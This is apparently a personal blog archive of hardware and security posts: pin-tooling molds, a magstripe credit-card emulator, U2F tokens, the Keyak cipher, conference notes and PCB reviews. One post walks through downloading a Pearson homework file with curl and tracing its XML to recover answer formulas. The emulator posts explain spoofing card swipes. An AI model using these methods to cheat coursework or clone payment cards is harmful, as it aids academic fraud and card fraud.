Reconfigurable pin tooling is not a new idea. In fact, patents for reconfigurable pin tooling systems go back at least 1-2 centuries [2]. There are many different designs. Some put smooth, elastic surfaces above the pins and others devise clever ways to actuate each individual pin.

My design

I tried to make it as simple as it could possibly be. I didn't look into actuating each pin but figured I could press the matrix of pins into the surface of the part that is being molded. Then, there would just need to be some way to "lock" the pins in place. After locking the pins in place, you have 1/6 of the possible surfaces needed to replicate the part in a mold!

As for the locking mechanism, I decided to make a 2-dimensional vice that would hold the pins in place from 4 sides. I coded up the design in openscad and parameterized it such that I could get renderings of it in open and closed positions.

Here is a rendering of the vice opened with a bed of pins floating in the middle.

Now the pins have been "pressed" against a surface of an arbitrary part, effectively creating a mold of it.

By closing the vice, the pins are held in place.

I figured this would be enough to start with. The design could be implemented by making parts for the walls of the vice and ordering parts for various rods, nuts, and bearings. Also need to find a source for making ideal pins.

Implementation

I 3D printed parts for the vice and also used parts that I ordered from McMaster. I used openscad for the design which I really like since it's fully parametric. So I can design the vice any way I want at first, and when I pick out parts from McMaster, I just need to change a few variables to ensure the design will fit the parts. Going the other way around (fitting the parts to the design) isn't always so easy. (Edit: I've since changed to Fusion360. Way better for most things.).

Here is my 2D vice. By turning the threaded rods with the thumb screws at the end, it pushes on the internal walls, which slide on nylon bearings. So to tighten the vice completely, you need to turn six rods (not convenient, but works).

Here is the vice tightened on a bed of pins.

For the pins, I just used the smallest steel key stock available online. I found the smallest to be 1/16in x 1/16in on McMaster. The pins, while each individually are cheap, still end up being the most expensive part of the design. This is because you need a lot of them to implement any moderately sized surface. To avoid high costs I designed for a surface that was only just over 1 square inch. Since it's pretty small, the 1/16in key stock resolution really sticks out. It still works, but for this to be practical, the ratio of surface size to pin cross-section would have to be much bigger or parts will look too chunky.

I tested the mold using silicon molding compounds (not under pressure). The part I molded against was a simple 6 sided die.

As you can see, my replicated 6-sided die is pretty chunky! I didn't bother to test its fairness. While this molding technique is certainly reconfigurable, resolution takes a hit. It would also have some serious problems when put under high pressure. For example, molten plastic would seep in-between the pins.

I tried brainstorming some ideas to fix problems with "chunkyness" and high pressure. Maybe the pins could be coated with some temperature and pressure resistant glue before using the mold. Then it could be removed mechanically or chemically when it comes time to reconfigure. Maybe the molten plastic / silicon could be placed in a special balloon that would inflate inside the mold under pressure, and could be removed after the part cools.

I haven't really come up with anything that I really liked. If anyone has any ideas, I would love to hear them.

Putting the pins in the vice

One problem that came up was that it was really hard to place the pins in the vice and maintain that they all be square with respect to one another. If you simply place them in the vice and tighten, they would all be a jumbled mess.

I solved the problem by creating a fine stainless steel mesh that I could put the pins inside first. It serves as an alignment tool before placing the pins in the vice. Putting roughly 300 pins in the mesh wasn't fun but it worked quite well.

I was able to get these meshes made by OSH Stencils, which is a company that makes cost effective stencils for soldering electronics. Turns out it is perfect for making pin matrix alignment tools. They use an industrial laser to cut 0.004" stainless steel sheet. And the tolerances are really good, all around 0.001". I got my stencils for like $15-20.

Conclusion

Reconfigurable pin tooling is pretty cool but far from practical I think. It is expensive to get enough pins to mold large surfaces, however, it is worth while if the molding process worked well. But as far as I can tell, it's no where close to working as well as conventional molds. Problems with "chunkyness" and pressure remain. If you have any ideas, let me know!

[1] Bahattin Koc, Sridhar Thangaswamy, Design and analysis of a reconfigurable discrete pin tooling system for molding of three-dimensional free-form objects, Robotics and Computer-Integrated Manufacturing, Volume 27, Issue 2, April 2011, Pages 335-348, ISSN 0736-5845.

[2] Munro C, Walczyk D. Reconfigurable Pin-Type Tooling: A Survey of Prior Art and Reduction to Practice. ASME. J. Manuf. Sci. Eng. 2007;129(3):551-565. doi:10.1115/1.2714577.

[3] My openscad design files, https://github.com/conorpp/reconfigurable-pin-matrix

/

Never miss a post

Last post on emulating a credit card

This is an update to a previous post about designing a credit card emulator. I got a custom made coil and it didn't work. I'm concluding the project here.

I first attempted to generate a magnetic field using only PCB traces as this would be easy and cost effective to create. But the field was not strong enough to be read by an external reader. I then wound my own coil with 36 gauge magnet wire such that it had a much higher coil density while still being as small as a mag-strip track. This worked but only when I held the card still in the reader -- if I moved the card while sending a signal (emulating a swipe), the reader would often fail to read the signal sent. I hypothesized that since my coil was crudely hand wound using a power drill, it had slightly non-uniform windings which caused significant variations in magnetic field as the non-uniform coil moved past the reader.

What I should have done at this point was invest some time in making a setup to read the full signal on an oscilloscope and experiment further. I was feeling somewhat impatient with this project at this point though, so I went ahead and got a coil wound by a shop that could get much more uniform windings.

custom coil

custom coil

Pictured above, is my "uniform" coil and it kapton-taped to a mag-strip blank. I tried it on my previous set-up with a mag-strip reader and unfortunately it did not work. The signal ending up being too weak, even when driving 0.5 amps through it. Despite the coil being uniform, now it probably has too small of a coil density because I did not specify this well when I ordered it. I have lost interest in this project but I'll conclude it with some takeaways.

Better testing means less iteration. My testing environment consisted of a driver circuit with some test credit card numbers and a mag-strip reader. This basically just gave me a boolean answer to whether if my design worked or not. Instead of trying out many different designs on this setup, it would have been better to put more time in improving the test set up with an oscilloscope so I could see more, and then try out only a couple designs. Then by the time it comes to order a custom coil, I have a better idea of the parameters to use. This seems obvious in retrospect but I think I had tunnel vision on this project while grad school demanded most of my attention.

The optimal coil for mag-strip emulation. It probably can't be done with PCB traces unless you drive a ton of current (5+ amps), which is impractical for credit card form factors. It will need to fit in a box roughly the size of 3in x 0.11in x 0.07in. I don't know any off the shelve coils you can get that would fit those dimensions so you will likely need to custom make it.

Synchronization. For emulation to work, the signal needs to be sent through the coil when it is in range of the credit card reader, not a moment sooner or later. How could it possibly know when? My idea was to use small buttons to act as one bit pressure sensors, which would get activated when a credit card is swiped through a reader. I was looking into using metal domes like from snaptron which come in ideal form factors and force ratings. I got the buttons but didn't make enough progress to try them for this purpose.

If anyone has a use for the coils or PCBs I made, let me know. I'm not going to use them.

/

Never miss a post

Designing a credit card emulator card

What this project is

Some time ago I got interested in emulating magstripes with electromagnets. There are some other projects that have done this, like magspoof. What I am really interested in figuring out is how to get the form factor to the size of a credit card. Arguably there isn't much utility to this except maybe storing multiple magstripe cards on one card, like some commercial products do. But I still think it's cool and I'd like to make it into a badge for the next DefCon.

Design challenges and fails

A normal magstripe card is embossed with a magnetic strip which holds either 75 or 210 bits per inch normally. You can picture it as taking a bunch of tiny magnets and laying them out with the poles pointing up and down the stripe. When you swipe the card, all the little magnets go by the reader, and the reader sees the magnetic polarity change a bunch of times.

You can emulate it easily with an electromagnet by just changing the current direction (a magstripe reader will see the same changes in polarity). One thing people might initially be confused by is how the reader "clocks" the data in. I.e. different people swipe cards at different speeds, how does the reader synchronize the data? The information is encoded in F2F. Basically the little magnets are sized such that the polarity will change at two rates, where one rate is always twice that of the other rate. So it can be synchronized by looking at the relative changes in polarity with respect to time. Binary one pulses will be twice as long as binary zero pulses.

Electromagnet design

The hardest part of this project I believe is getting a proper coil and enough current to run through it so the magnetic field is strong enough. I first tried seeing if traces on a 2 layer PCB could suffice to generate a magnetic field strong enough for a reader.

The ISO specs don't actually specify the magnetic field strength that is needed, but rather say something along the lines of "it should be between 0.7 and 1.2 times that of a reference card." I couldn't really theorize much so I just went ahead and tried it.

This is front and back of the first PCB card I tried. I drove it using a similar circuit as in magspoof and tested it with a real magstripe reader.

The traces are going up/down the card in the two magstripe track locations so that the magnetic field generated would be pointed up/down the stripe like in a real magstripe.

I tried to maximize the number of turns per length in attempt to make the field stronger but I didn't think of the major field cancellation that would occur since the traces on front/back of the card are aligned to each other. Needless to say, it did not work.

For this next iteration, I half fixed the field cancellation issue. I drew the front and back traces to be at a 45 degree angle with respect to each other. So there would still be cancellation, but it would be half as much as before. I figured that if using a 2 layer PCB for this purpose is going to work at all, this was the way to draw it. But I'm no electrical engineer; if anyone has any other ideas, please comment or contact me.

It worked a little bit with the magstripe reader. I made a crude test with magnetic filings to compare the magnetic strength of the PCB traces with a credit card to see if it fell within the "0.7 to 1.2" factor range.

I ran about 2 amps through the PCB traces and the amount of iron filings that stuck to the coil was dismal compared to the credit card. I figure the only thing that could work after this is a custom made coil.

Next attempt

I made my own coils using 36 gauge magnet wire, plastic, tape, and a drill. Running it through the reader, it seemed to work pretty reliably.

I ordered some custom shaped coils that are uniform and thin enough to fit in a credit card form factor. I did this by searching on Alibaba and emailing some drawings.

I will make an update later on!

Acknowledgements

Thanks to PCB minions for making good PCBs and having good service.

/

Never miss a post

A review of some SMT buttons

A review of surface mount buttons

I haven't posted in a long time and I am now finally making updates. I'm going to start with something super exciting (not really). This is a brief review of some surface mount buttons. Tactile push buttons, to be specific.

When picking out a button I'm tempted to just purchase a bunch of different ones to see which one I like since it's hard to get a feel for ergonomics from an online distributer like Digikey. So this is to post pictures of what I ordered and to make some comments for other people looking for the perfect SMT button.

The buttons

Vanilla option

The most basic button I think most SMT projects get. Relatively big, easy to push. Stick out color.

Links:

Low profile, good area

I like this type since it's pretty easy to push, a lower height, and a nicer color profile. Soldering it by hand might be a little more difficult.

Link.

Small area, still good tactile feedback

This is an even smaller button and still has good tactile feedback. Since it has smaller surface area to press, I think it's not quite as easy to give input via finger as the other options.

Link. Worth noting that the color of the button in the image is not necessarily the real color of the button.

Really small, bad feedback

These are the smallest buttons I got. They definitely don't provide good tactile feedback and are relatively difficult to press using just a finger. These would be good for when you don't want the button to be pressed by accident -- a person would have to grab a pen or something and very deliberately press it.

Links:

Metal domes

These are quite different from all the rest. Metal domes, as offered by snaptron, come in a lot of different shapes and sizes. One thing that I like is that they are all rated by the amount of force required to "press" the dome in. I got a nice sample to test out using these domes as small, 1 bit pressure sensors. They can't be soldered, but there are a couple other methods to attach them to a PCB, all pick and place compatible.

What am I missing?

Currently this is a small list. Send me a message if you think I missed something. I appreciate mail and I will update my post if I get anything.

/

Never miss a post

Keyak: a candidate for the authenticated encryption standard

New authentication cipher

Keyak is an authenticated crypto system that is based on the Keccak sponge primitive. It is a candidate for the authenticated encryption standard in NIST's Caesar competition. For those not familiar, Keccak is the recent new standard for a hashing algorithm, SHA-3. The sponge primitive is a neat construction. By itself, it is a secure hashing primitive, but can easily be extended to provide encryption, pseudo random number generation, and authentication primitives.

In this post, I will explain how Keyak works by explaining how one can build upon the sponge primitive. Then I will share how my research group is planning to optimize it for performance.

So what is an authenticated cipher again?

Not surprisingly, it's a crypto algorithm that will provide confidentiality and authentication to communicating parties. AES (the current encryption standard) only provides confidentiality; it protects from eavesdropping but provides no mechanism to ensure you are communicating with a friend or potential foe.

Why not just keep using HMAC's?

An HMAC (hash-based message authentication code) will provide authentication but relies on hash algorithms separate from the cipher being used. Many different ciphers and hashes can be combined to provide authenticated ciphers, each with different trade-offs.

However, using two algorithms combined is relatively inefficient. Also because of the lack for a standard, unnecessary complications may arise. TLS, for example, has had a fair share of attacks, many of which can be attributed to the complicated nature and diverse cipher support of TLS.

And when security relies on a complicated protocol, it becomes difficult to program. Remember Heartbleed? Goto fail? BERserk?

How Keccak comes into play

To start, let's make our own cipher that is based on Keccak and develop it until it is like Keyak.

The Keccak sponge construction is illustrated below. All you need to understand is that it absorbs up to 1600 bits at a time and outputs a 1600 bit permutation. Any additional input can be XOR'd into the output block of a permutation round ƒ and applied to another ƒ. Rinse and repeat.

Above, the permutation ƒ is repeated 4 times in the "absorbing" stage for the input and 2 times in the "squeezing" stage for the output. I.e. a 6400 bit message M is input and a 4800 bit hash Z is output.

Keccak specifically parameterizes how many rounds it should go through in each ƒ and then how much output should be pulled at the end for the final hash. But for our purposes, it isn't necessary to think about parameters. Let's implement our cipher.

Instead of feeding input to ƒ, we can first input a secret key (and nonce). I.e. we initialize the sponge state with our secret key. This will ensure all of our following applications of ƒ are unique and full of entropy.

Now think that for each ƒ of the sponge we apply, we will get a new "hashed" version of our secret key in a way. We get 1600 bits of new "hash" each time and we can do this as much as we want. It is these "hash-like" blocks that we can XOR our message with. It's like a pseudo one time pad.

Our recipient, who has the same secret key (and nonce), can compute the same "hash-like" blocks. Upon receiving the ciphertext, he can XOR it with his computed "hash-like" blocks to get the clear text message.

Pretty nice, huh? The security of the cipher is based on the security of Keccak, which we can take some comfort in.

Adding simple and strong authentication

We're still missing the big picture: authentication. Our cipher currently only yields confidentiality. Let's add a couple more steps.

So instead of just reapplying ƒ to the secret key to get a bunch of "hash-like" blocks, we will include the message XOR'd in each input before reapplying ƒ to get the next block. That way each new block is based on the initial secret key and the message being enciphered. After the whole message has been encrypted, we can run f one more time to get a block that we will simply use as our authentication tag.

Since this authentication tag relies on the sponge state that is a byproduct of the secret key and the enciphered message, only recipients with the exact secret key and unaltered ciphertext can recompute it.

In the figure, K is our secret key and α0 is the nonce and padding. Let's say that M is our clear text message. For each block of M, the sender will XOR it with a "hash-like" block Z to make a block of cipher text, α. As long as there are blocks of M left, the most recent α will be input to ƒ to create a new Z. After all message blocks are enciphered, the last α will be input to ƒ again to create the authentication tag.

The receiver pretty much does the same thing except starts with the blocks of ciphertext (α) first rather then the plaintext. The message is revealed by simply calculating Z XOR α one block at a time.

Now for the exciting part.

The receiver can then apply ƒ one more time after decryption to recompute the authentication tag. If it's equal to the received authentication tag, then the message is authentic!

This is the basis for Keyak. I find it to be quite clever and superior to current authenticated crypto systems. Not only is it based on Keccak, but it combines encryption and authentication into one innate process. This sure beats the canonical method of encrypting and then calculating an HMAC over it.

Get prepared for creativity

There is certainly more to Keyak then the simple process I described. It supports meta-data which can be sent as cleartext but will be included in ƒ's input so that it is still authenticated. It can be parameterized to set the block size, Keccak permutation used, and number of encryption processes to run in parallel. Yup, Keyak supports parallelism as well.

My impression is that Keyak is modeled after a motor boat. It has the following layers:

  • Motorist layer: responsible for handling the parameters. The motorist starts an "engine" which can be fed input (either ciphertext or plaintext) to be wrapped, where wrapping can be encrypting or decrypting. If decrypting, an authentication tag will also be input and verified. Only if the verification is successful, the engine will return the plaintext. If encrypting, ciphertext with a corresponding authentication tag will be output.

  • Engine layer: responsible for distributing blocks of input to it's various pistons and piecing together the piston output.

  • Piston Layer: where the work actually gets done. Each piston can be initialized with a secret key and nonce. Each piston applies ƒ to a particular input to update the sponge state with a new "hash-like" block (Z). They do the wrapping of the input with the "hash-like" blocks to get the ciphertext or plaintext as in our simple algorithm above.

The pistons do the bulk of the work and each one is independent of the other. This allows them to be run in parallel for performance.

Optimizing Keyak for performance

For a naïve optimization, Keyak could be parallelized using thread level parallelism by simply assigning a thread for each piston. It's a little overkill since each thread would be reduntantly executing the same instructions, just on different data.

Let's consider Flynn's Taxonomy which contains 4 classifications for computer architectures.

  • SISD (single instruction single data) where 1 instruction is computed at a time, each on different data. Your regular CPU cores each do this.

  • MISD has multiple instructions executing in parallel for the same piece of data. This is not common but could be useful for fault tolerance.

  • SIMD has one instruction execute for multiple pieces of data. This is common in graphics processing and is abundant in GPUs.

  • MIMD is multiple instructions executing in parallel for different pieces of data. Modern CPUs do this by having multiple cores.

So pistons in Keyak are each running the same instructions, but each on different data. Any idea which architecture would be most efficient for optimizing Keyak?

If you think it's SIMD (single instruction multiple data), then you are right!

My research group will be looking into using SIMD to optimize Keyak. Since SIMD is commonplace in graphics we will be implementating Keyak optimizations on a GPU.

Wrapping it up (pun intended)

Keyak is a great study. Not only is it a good read for it's overarching Engine metaphor, but it's a completely different way to do encryption from an algorithmic standpoint. It's totally different from the typical substitution-permutation networks that many current ciphers are based on, including AES. It's kind of weird, really; but that's likely a good thing for a contender in the CAESAR competition.

This is a high level post; to learn more check out the Keyak website and the paper below.

References

/

Never miss a post

Designing and Producing 2FA tokens to Sell on Amazon

I made a two factor authentication token and have made it available on Amazon. In this post I'll talk about the design, how I produced it affordably, and some metrics about selling on Amazon. If you're interested in doing something similar, you can copy everything as it's all open source.

Update: I've replaced this project with a superior security key, Solo.

The design

It uses the U2F protocol, which is a standard developed by the FIDO Alliance and Google. U2F uses challenge response for authentication and is based on the P-256 NIST Elliptic Curve. FIDO additionally provides U2F standards for transports like USB, Bluetooth, and NFC which makes a project like this ideal.

I decided that a U2F token would need to meet 3 core requirements:

  1. A good source of randomness to generate keys.
  2. Strong computation for the crypto (using an 8 bit processor would be too time consuming).
  3. Tamper resistance. Hard to duplicate.

I chose to use the following components to implement the design (in order of importance):

  • ATECC508A - Atmel chip that securely implements P-256 signatures and key generation *.
  • EFM8UB1 - Cheapest microcontroller with USB.
  • RGB LED - Better user experience.
  • Other discrete components - Button, bypass capacitors, ESD protection, current limiting resistor.

The ATECC508A chip fulfills all security requirements because it has a hardware RNG, write only keys, and hardware acceleration for elliptic curve operations **.

You can see the full source of the design here.

It would be much better with a tamper resistant case or coating, but the initial capital to get that going is currently out of my reach.

Producing it

This is the fun part. I was originally hopeful when starting this project that I would be able to solder everything in one night. But that proved to be too time consuming, messy, and unreliable. So I got it fab'd and assembled at PCBCart. But the real challenge was programming the tokens.

Programming was a challenge because it's dependent on my scripts to handle the initial configuration of the ATECC508A chip and creation of a unique attestation cert for each U2F token. In other words, one binary firmware blob did not cut it. Each token needed to be programmed once to be "customized" and then programmed again with a signed build *. It took me about 1-2 minutes to program a U2F token while prototyping.

Manufacturers like PCBCart typically offer mass programming services but my process was too complicated and would have ended being untrustworthy and expensive.

I decided to program everything on my own while promising to my future self that I would make a pipelined process to get everything done affordably and in a reasonable amount of time.


Fast forward a couple months, I have a lot of U2F tokens from PCBCart:

I automated and optimized my programming setup. I acquired 3 programmers, 3 USB extension cables, and made 3 connectors using protoboard and machine pins.

How it would work:

  1. I plug in a U2F token to a USB cable for power and plug in a programmer.
  2. I press a button on my keyboard to start programming from that programmer.
  3. The script flashes a setup firmware with a unique serial number so the token can be communicated with in parallel with other tokens.
  4. The configuration and signing occurs.
  5. A final program is built and programmed.
  6. The token is told to blink green and blue so I can see that it is done.

This process takes about 10 seconds per token. Because I had three setups, I could get up to three working at the same time. It would have been quicker with 4 or 5, but eventually I wouldn't be able to plug them in fast enough to get more than 5 programming at the same time.

It took me about 4 hours total to get through everything. I watched two movies (props if you can figure out which ones). Occasionally my pipeline would stall on some edge cases and I would have to restart but it was mostly smooth. I only had 1 token from PCBCart that didn't work (which is okay since PCBCart made a couple extras).

Fulfillment by Amazon

My goal was to have U2F Zero listed in stock for at least a year. I don't know how many I can expect to sell so it's a bit of a shot in the dark. I know I don't want to be bothered handling payments and shipping so going with a distributer is needed. I decided to go with Amazon because they make it so easy for most people to order things online (and free shipping).

Typically to list a product on Amazon, it's very easy if it's already listed. You just pick the already listed product and reuse all of the information already there.

But if you're adding a new product, you have to consider a couple options:

  1. New Brand Owner: If you own the brand of a product not currently on Amazon, you must apply for Amazon to approve your brand and then list the product.
  2. New product but not brand owner: If you want to list a product but you do not own the brand for it, you need to get permission from the brand owner to sell it and then Amazon will allow you to list the product.

Because I was the owner of the brand (I called it U2F Zero), I attempted option (1). However, unmentioned in their documentation, Amazon requires that the brand be printed directly on the packaging to protect the brand. Stickers or labels do not count. All I had and had planned to use was polybags and labels.

I didn't want to back up and get everything repackaged with my "brand" printed on it. I decided that the owner of the U2F Zero "business" would be my LLC -- ConorCo.

I wrote a letter to ConorCo LLC and asked for permission to sell their product, U2F Zero, on Amazon. The majority shareholder of ConorCo LLC, Conor Patrick, promptly signed off to give me permission to do that. I then submitted this to Amazon, in compliance with option (2). Amazon promptly accepted the application and listed U2F Zero.

After a polybag and labeler packaging party with help from my roommates, U2F Zero is available on Amazon.

Fortunately I had "U2F Zero" printed on the PCB before I even knew that I needed to. Amazon may not have accepted it otherwise. The domain u2fzero.com points to a launch page required for the Amazon application.

Some costs

Including all parts, PCBs, and assembling, each token costs about $3.40 to make. This is cheaper then just making 1 token because costs go down when purchasing large volumes.

There's also the cost of prototyping, buying new tools, and frictional costs. For example, I got hit with a $126 tariff when importing the assembled boards from China. I also have some extra tokens not being sold to use for replacements. I estimate the real cost was actually about $4.18 per token.

Amazon takes about $2 out of each sale. How much Amazon takes depends on the product. U2F Zero qualifies for Amazon's Small and Light fulfillment program which has the smallest fees.

If I sell out at $8 per token, I would make a 43% ROI. That's optimistic though. I may have to drop the price later on if needed. The break even price would be around $6.20. I don't know what to expect. I'll make a post about this later on.

Wrap up

I'm by no means an entrepreneur but I'd like to keep trying to be one. This project has been a long term experiment and the experience has been great for me. I am not actually concerned with financial success or growth. The nice thing about this project is I can just let it sit and I don't need to maintain anything -- leaving me time to move on to the next project.

Feel free to make your own U2F Zero or mass produce it. Maybe you can figure out how to produce them cheaper than what I could.

* Calling something secure isn't simple. Here's a better analysis.
** Finding a chip that has secure public key crypto (P-256) implementations is non-trivial. I got lucky when I found Atmel's chip which was easy to purchase and get documentation for. Other manufacturers that offer potential secure chips are NXP, ST Electronics, and Infineon. But none of them sell their secure chipsets on normal distributors and seem to require customers to go through NDAs, licensing, and large minimum order requirements. I hope the market for public key hardware becomes more transparent.
* The public key in the build is signed for device attestation.
/

Never miss a post

My experience going to Defcon and SAC

I just attended Defcon 24 in Las Vegas and went to SAC (Selected Areas in Cryptography) afterwards.

Defcon

Defcon is a great conference that hosts around 15k people every year. People come to share their new research in infosec and exploits that they have developed over the past year. Some people come to partake in the various competitions like the badge puzzle. And of course there are the parties that various vendors and groups throw.

I got to LV a day early so I could attend the unoffical Defcon Shoot. It's where a bunch of people bring guns to go shoot in the desert. I didn't have anything to bring but most people are nice and let you shoot their weapons for the cost of ammo. I got to put 100 rounds through an M60:

The Villages

In addition to the official talk tracks put on by Defcon, there are the villages. The villages are separate groups that focus on more specific parts of security. Each village typically hosts their own set of talks or competitions.
To list the different Villages from this year:

  • Bio Hacking
  • Car Hacking
  • Crypto and Privacy
  • Hardware Hacking
  • IoT
  • Lockpicking
  • Packet Hacking
  • Social Engineering
  • Tamper Evident

I spent a lot of time in the Crypto and Privacy Village this year as they often have talks I'm interested in. I also learned a little bit about getting past tamper evident envelopes and tape at the Tamper Evident Village which was fun.

One of my friends went to the Bio Hacking Village and got an NFC chip inserted into his hand:

It's supposed to last for life (or until you remove it surgically). We of course first programmed it with this link to pop up anyone's phone that read his hand.

But my favorite part about Defcon is getting to meet new people and catch up with old friends.

I met the folks behind AND!XOR and learned about their creation of the Bender Badge:

Bender

I only went to like one or two of the talks. I think at a conference like this, most of the fun and memorable things will happen outside of the talks.

There was a Cyber Grand Challenge sponsored by DARPA. The challenge was to make the best automated computer system that would find and patch bugs in software. They had teams from different universities competing for millions of dollars. The competition was narrated and animated to give it an eSport feel. It was really cool, but ultimately it gets boring to watch computer programs run (really fast) despite all of the animations.

Then each night there are a lot of parties. Each is hosted by companies or other groups that are popular at Defcon. Some of the parties are awesome; but a lot of them I think are bad because it's either really long lines or just a bunch of fellow nerds trying to dance.

The lines really put me off. If there's a long wait then don't bother waiting. There's this norm where the hosts will keep the lines long even when there's plenty of room inside. I guess it helps make the party seem better than what it really is.

I get that there isn't enough room for everyone, but some groups I think do it better. For example, the Telephreak group held an invite only event for well known hackers and left open challenges that skillful people at the conference could solve. If you could solve it, then you could get an invite. Unfortunately I flew out of LV before the Telephreak party otherwise I would have tried to solve one of their challenges.

There's so much going on at Defcon that you can't possibly participate in everything. But it's great and I'll be going next year.

Selected Areas in Cryptography (SAC)

This was purely an academic conference that focuses on, well, selected areas in cryptography. The research group I work in at Virginia Tech did a lot of work in fault attacks and countermeasures. SAC had a special focus this year on fault attacks and side channel analysis. So we submitted a paper and I traveled to present it.

If you're interested, check out my advisor's post for an overview of our work.

This was my first time at an academic conference and my first time presenting at any conference. It was pretty laid back. There was around 100 attendees of people from around the world and about 30 speakers. I suppose that's what to expect from small conferences.

It was an awesome experience for me to get to meet other researchers in the field and see people that are on papers I've previously studied. I got to meet other graduate students that know a lot about crypto.

It's pretty motivating to come back from a conference so related to your research and meet like minded people. I feel like I think of a lot more ideas of things to work on coming back to the lab. As Francesco Regazzoni put, (paraphrasing), "For the students here, there's one thing you should get from a conference like this, and that's a big idea. By the end of this, you should feel like there's a big problem you want be working on."

Newfoundland

SAC was held in St. Johns in Newfoundland, Canada. Fortunately the weather was still good and the area was really nice.

I hiked Signal Hill, which was the first place to receive a transcontinental wireless signal.

Signal Hill

The conference also hosted a Puffin and Whale watching tour. I never thought myself to be much of a whale watcher but this was actually really cool (even though we saw no whales). Turns out there's this island of the coast that most of the Puffin race relies on to lay their eggs for various ecological reasons. And they were all there because it was the egg laying time of the year. It was surprising to see thousands of puffins all flying around you at once. We were told to not look up with our mouths open. Unfortunately my camera was dead and I couldn't get a picture.

On the last day, me and a couple friends I met went to a small town called Quidi Vidi to try out the brewery there. They make a lager called Iceberg Beer from the water of melted icebergs. It was pretty good!

At the brewery, I think me and the other grad students stuck out -- None of us were from Canada and most of the crowd was older. One lady even tried calling me out for not being old enough to drink (in good fun). All of the local were very nice. One local sat down with us and exchanged stories. He even offered to take us fishing!

There's this tradition in Newfoundland for newcomers to drink a shot of Newfoundland Screech Rum and then kiss a cod. Some of the bars will let you honor this tradition but I forgot to ask. I did get a chance to drink the rum (which was good). Next time I go down I will try to kiss the cod.

/

Never miss a post

Pearson Educations client side method for checking homework answers

Exploitable Method

By exploitable, I don't mean in the traditional security sense. I mean exploitable by lazy undergraduate students.

Pearson Education runs a large set of web applications that colleges use to automate their tedious ABET required courses. I was stuck in one my senior year and noticed that they check homework answers client side.

Pearsons physics web application (Mastering Physics) used to be "exploited" via a small bit of JavaScript that would expose the homework answers loaded client side. It has long been fixed. As I'll show you in this post, homework answers are still checked client side. They just obfuscated it further.

Disclaimer: I don't like cheating. I'm not providing a means for others to cheat.

Obfuscated client side checking

For the class I was in, the homework was run in a bloated Flash application.

I considered looking at how the applet worked using a decompiler or debugger but quickly realized how big of a pain it would have been as the applet is over 1 MB. Instead, I looked at other files the applet uses.

If you open Chrome's network tab in the development tools, you can see all of the resources that the flash applet loads. Looking at the other resources downloaded, one file called "I0604041.Ipx" stood out. It can be downloaded without any authentication, so feel free to follow along:

curl -o hw.ipx 'https://www.mathxl.com/books/sullee16/Ipx/c6/I0604041.Ipx'

After a quick inspection, one can see that it is just a zip file. Let's see what's inside.

unzip hw.ipx

Unzipping reveals two XML files: _manifest.xml and 14037884_006!Sullivan15e.6.4.5.tdxex. At this point a lazy student would be hoping to find the answered enumerated in one of the files. But it's not that simple.

_manifext.xml just contains some irrelevant metadata. The other file is quite large (~1420 lines of XML) and details the layout and problems for the homework. No where in it are the "answers".

Let's look closer and try to figure out how it's used the by the Flash applet. Here is a snippet from the large XML file:

<text>The PW of the difference between the old and new systems is $</text>
<control br="0" vshiftabs="1" spacing="1" textstyle="Normal" data="">S1</control>

It is a homework problem that asks for the PW of the difference between two systems. It would normally be displayed in the Flash applet. After the "$" is a spot for the student to enter an answer. But in the XML we see a "control" tag instead that wraps a value called S1.

If we search the XML for other references to S1, we see something that looks like a definition:

<field name="S1" format="" tol="5" acceptunformattedvalues="1" rule="numeric">
  <solution>
    <expr>~dpw</expr>
  </solution>

Here S1 gets defined as ~dpw. Okay. Let's continue down the rabbit hole and see if we can find a definition for ~dpw.

<var name="dpw" type="int" format=",">
  <constraint>
    <incl>
      <expr>-~dcost+~dlc*((((1+0.01*~p)^60)-1)/(0.01*~p*(1+0.01*~p)^60))+~dmv/((1+0.01*~p)^60)</expr>
    </incl>
  </constraint>
</var>

It looks like the definition for dpw is a non-trivial equation that contains references to other variables like dcost, dlc, and p. But the equation looks suspiciously like the work needed to be done to honestly solve the problem about "PW system differences".

At this point I made a pretty confident hypothesis of how the flash application works. It reads this XML file to generate the markup for all the homework problems. It then recursively follows this definition tree to figure out what the answers are. It also is calculating the answers on the fly, meaning no free lunch for the lazy student. After solving the homework problem the honest way, I manually solved the tree of definitions and found the correct answer, which confirmed my hypothesis.

Assuming that most of Pearsons online classes use the same functionality, Pearson is clearly checking homework answers client side, which can always be exploited.

For this case, it would require someone to go through more work recursing through an XML file than it would be to just do the homework. Alternatively, someone could write a program to automate it - but who knows how much work that would be, as it would be equivalent to rewriting Pearsons Flash applet.

Should Pearson change anything?

Of course, this can be solved by server side checking. But I feel it's not really necessary. The Flash applet is hard enough for the average student to cheat. And in the end, cheating students only cheat themselves.

/

Never miss a post

My experience with DirtyPCBS.com

Dirty Cheap Dirty Boards

If you want to order custom made PCB's for a small price, Dirty PCB's is probably your cheapest option. This used to just be a service that was internal to Dangerous Prototypes to make cheap boards for their own projects. Now it's public and they make dirty cheap boards for anyone.

To get an idea, you can buy ~10 boards that are 5x5 cm for $14 (free shipping). You can get more boards, larger sizes, and more layers as well for relatively cheap prices.

Here I'll share my experience with Dirty PCB's and photos of a U2F 2FA token I've been working on. I ordered the same boards from Seeed Studio as well to compare.

The revisions

This is my first PCB so the first one is pretty dirty by design and not just because of Dirty PCB's. The next revision is a better layout.

Revision 1 from Dirty PCB's

R1 Dirty PCB's front

R1 Dirty PCB's back

Revision 1 from Seeed Studio

R1 Dirty PCB's front

R1 Dirty PCB's back

You can see that the layout is pretty poor. None of the traces really make 45 degree angles or care about what angle they cross over each other between layers.

Also there is no ground plane. I don't really need one but decided to add one later.

There isn't too much of a difference in quality between the two boards. But you can still see why Dirty PCB's is cheap:

  • The silkscreen (white coloring) is smudgy and doesn't have as good of a tolerance.
  • The solder mask is not as well aligned with the pins. Look at where the red/green covering meets the pins.
  • The vias are bigger and make some of the pins look smudged.

Look at both board pictures in new tabs and you can see these differences in quality for yourself.

At the time Seeed was a little more expensive ($10 for 10 boards + $10 shipping) and charged more for 2mm thick boards which is necessary for me because they fit best in a USB socket. Now it seems their pricing is similar to Dirty PCB's.

After revising my layout design, I made two more orders from Dirty PCB's.

Revision 2 Dirty PCB's

R2 back

R2 back

I'm not sure what happened to the silkscreen on this one. It seems any traces or ground plane overlapped the silkscreen. I suspect it was an issue at the board house since the next revision, (which is really the same layout, just a different color) did not suffer this problem.

Revision 3 Dirty PCB's

R3 back

R3 back

Where to get PCB's

